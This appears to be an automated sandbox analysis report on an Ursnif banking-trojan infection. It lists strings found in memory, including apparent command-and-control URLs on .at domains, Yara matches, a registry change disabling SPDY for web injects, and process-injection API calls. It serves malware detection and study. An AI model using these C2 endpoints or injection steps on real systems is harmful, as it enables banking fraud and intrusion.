Source: explorer.exe, 0000001D.00000000.558338655.0000000007E1D000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3
Source: explorer.exe, 0000001D.00000000.544734516.0000000000E60000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/x
Source: {81817914-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr, ~DF637F64B7AC0A53C0.TMP.13.dr String found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/xXyOPB
Source: explorer.exe, 0000001D.00000003.591331392.000000000F2D0000.00000004.00000040.sdmp String found in binary or memory: http://api10.laptok.at/favicon.icoyu1SPS
Source: explorer.exe, 0000001D.00000002.639553770.00000000063BB000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/gs-
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.639553770.00000000063BB000.00000004.00000001.sdmp String found in binary or memory: http://chat.allager.at/jvassets/xI/t64.dat
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.560164145.000000000E1DB000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml5.13.dr String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml6.13.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml7.13.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml8.13.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.568586726.0000000005F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492017144.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.579706123.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491990075.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492004462.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498916612.000000000591B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.574197225.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491965046.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491881653.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.579141799.000001B576620000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491855597.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 632, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.568586726.0000000005F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492017144.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.579706123.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491990075.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492004462.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498916612.000000000591B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.574197225.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491965046.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491881653.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.579141799.000001B576620000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491855597.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 632, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Contains functionality to call native functions
Source: C:\Windows\explorer.exe Code function: 29_2_04CE4674 NtQuerySystemInformation, 29_2_04CE4674
Source: C:\Windows\explorer.exe Code function: 29_2_04CE33F8 NtQueryInformationProcess, 29_2_04CE33F8
Source: C:\Windows\System32\control.exe Code function: 30_2_004E68E0 NtReadVirtualMemory, 30_2_004E68E0
Source: C:\Windows\System32\control.exe Code function: 30_2_004F70B8 NtMapViewOfSection, 30_2_004F70B8
Source: C:\Windows\System32\control.exe Code function: 30_2_004F1154 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification, 30_2_004F1154
Source: C:\Windows\System32\control.exe Code function: 30_2_005029D0 NtAllocateVirtualMemory, 30_2_005029D0
Source: C:\Windows\System32\control.exe Code function: 30_2_004EC188 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 30_2_004EC188
Source: C:\Windows\System32\control.exe Code function: 30_2_004F9B08 NtCreateSection, 30_2_004F9B08
Source: C:\Windows\System32\control.exe Code function: 30_2_004E33F8 NtQueryInformationProcess, 30_2_004E33F8
Source: C:\Windows\System32\control.exe Code function: 30_2_004E2CC0 NtQueryInformationProcess, 30_2_004E2CC0
Source: C:\Windows\System32\control.exe Code function: 30_2_004E7F44 NtWriteVirtualMemory, 30_2_004E7F44
Source: C:\Windows\System32\control.exe Code function: 30_2_004F6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 30_2_004F6F64
Source: C:\Windows\System32\control.exe Code function: 30_2_00521003 NtProtectVirtualMemory,NtProtectVirtualMemory, 30_2_00521003
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 32_2_000001B5767B6F64
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A33F8 NtQueryInformationProcess, 32_2_000001B5767A33F8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767E1003 NtProtectVirtualMemory,NtProtectVirtualMemory, 32_2_000001B5767E1003
Detected potential crypto function
Source: C:\Windows\explorer.exe Code function: 29_2_04D0FD7C 29_2_04D0FD7C
Source: C:\Windows\explorer.exe Code function: 29_2_04CE4734 29_2_04CE4734
Source: C:\Windows\explorer.exe Code function: 29_2_04CE3908 29_2_04CE3908
Source: C:\Windows\explorer.exe Code function: 29_2_04CE7CCC 29_2_04CE7CCC
Source: C:\Windows\explorer.exe Code function: 29_2_04CE34A0 29_2_04CE34A0
Source: C:\Windows\explorer.exe Code function: 29_2_04CEBC1C 29_2_04CEBC1C
Source: C:\Windows\explorer.exe Code function: 29_2_04CF7434 29_2_04CF7434
Source: C:\Windows\explorer.exe Code function: 29_2_04CE3D81 29_2_04CE3D81
Source: C:\Windows\explorer.exe Code function: 29_2_04CFEDA0 29_2_04CFEDA0
Source: C:\Windows\explorer.exe Code function: 29_2_04CEB55C 29_2_04CEB55C
Source: C:\Windows\explorer.exe Code function: 29_2_04CF7D60 29_2_04CF7D60
Source: C:\Windows\explorer.exe Code function: 29_2_04CE4578 29_2_04CE4578
Source: C:\Windows\explorer.exe Code function: 29_2_04D0AD28 29_2_04D0AD28
Source: C:\Windows\explorer.exe Code function: 29_2_04CFAE80 29_2_04CFAE80
Source: C:\Windows\explorer.exe Code function: 29_2_04D02E04 29_2_04D02E04
Source: C:\Windows\explorer.exe Code function: 29_2_04CE5628 29_2_04CE5628
Source: C:\Windows\explorer.exe Code function: 29_2_04CE8FC8 29_2_04CE8FC8
Source: C:\Windows\explorer.exe Code function: 29_2_04CF9FD0 29_2_04CF9FD0
Source: C:\Windows\explorer.exe Code function: 29_2_04D0DFF8 29_2_04D0DFF8
Source: C:\Windows\explorer.exe Code function: 29_2_04CF07AC 29_2_04CF07AC
Source: C:\Windows\explorer.exe Code function: 29_2_04CEAF44 29_2_04CEAF44
Source: C:\Windows\explorer.exe Code function: 29_2_04D01F74 29_2_04D01F74
Source: C:\Windows\explorer.exe Code function: 29_2_04CE9F7C 29_2_04CE9F7C
Source: C:\Windows\explorer.exe Code function: 29_2_04D0D72C 29_2_04D0D72C
Source: C:\Windows\explorer.exe Code function: 29_2_04D0B0F8 29_2_04D0B0F8
Source: C:\Windows\explorer.exe Code function: 29_2_04D0F8E8 29_2_04D0F8E8
Source: C:\Windows\explorer.exe Code function: 29_2_04D08844 29_2_04D08844
Source: C:\Windows\explorer.exe Code function: 29_2_04CE207C 29_2_04CE207C
Source: C:\Windows\explorer.exe Code function: 29_2_04CE8824 29_2_04CE8824
Source: C:\Windows\explorer.exe Code function: 29_2_04D059F8 29_2_04D059F8
Source: C:\Windows\explorer.exe Code function: 29_2_04CEC188 29_2_04CEC188
Source: C:\Windows\explorer.exe Code function: 29_2_04D0610C 29_2_04D0610C
Source: C:\Windows\explorer.exe Code function: 29_2_04CEA2EC 29_2_04CEA2EC
Source: C:\Windows\explorer.exe Code function: 29_2_04D082E0 29_2_04D082E0
Source: C:\Windows\explorer.exe Code function: 29_2_04CF6A74 29_2_04CF6A74
Source: C:\Windows\explorer.exe Code function: 29_2_04D0D26C 29_2_04D0D26C
Source: C:\Windows\explorer.exe Code function: 29_2_04CFCA04 29_2_04CFCA04
Source: C:\Windows\explorer.exe Code function: 29_2_04CF021C 29_2_04CF021C
Source: C:\Windows\explorer.exe Code function: 29_2_04CEEBAC 29_2_04CEEBAC
Source: C:\Windows\explorer.exe Code function: 29_2_04CF0BB0 29_2_04CF0BB0
Source: C:\Windows\explorer.exe Code function: 29_2_04D00354 29_2_04D00354
Source: C:\Windows\explorer.exe Code function: 29_2_04CFE35C 29_2_04CFE35C
Source: C:\Windows\explorer.exe Code function: 29_2_04D09344 29_2_04D09344
Source: C:\Windows\explorer.exe Code function: 29_2_04CE7B14 29_2_04CE7B14
Source: C:\Windows\explorer.exe Code function: 29_2_04CFC324 29_2_04CFC324
Source: C:\Windows\System32\control.exe Code function: 30_2_004EC188 30_2_004EC188
Source: C:\Windows\System32\control.exe Code function: 30_2_004FAE80 30_2_004FAE80
Source: C:\Windows\System32\control.exe Code function: 30_2_004F2F90 30_2_004F2F90
Source: C:\Windows\System32\control.exe Code function: 30_2_00508844 30_2_00508844
Source: C:\Windows\System32\control.exe Code function: 30_2_004E207C 30_2_004E207C
Source: C:\Windows\System32\control.exe Code function: 30_2_004E8824 30_2_004E8824
Source: C:\Windows\System32\control.exe Code function: 30_2_0050B0F8 30_2_0050B0F8
Source: C:\Windows\System32\control.exe Code function: 30_2_0050F8E8 30_2_0050F8E8
Source: C:\Windows\System32\control.exe Code function: 30_2_004E3908 30_2_004E3908
Source: C:\Windows\System32\control.exe Code function: 30_2_0050610C 30_2_0050610C
Source: C:\Windows\System32\control.exe Code function: 30_2_005059F8 30_2_005059F8
Source: C:\Windows\System32\control.exe Code function: 30_2_004F6A74 30_2_004F6A74
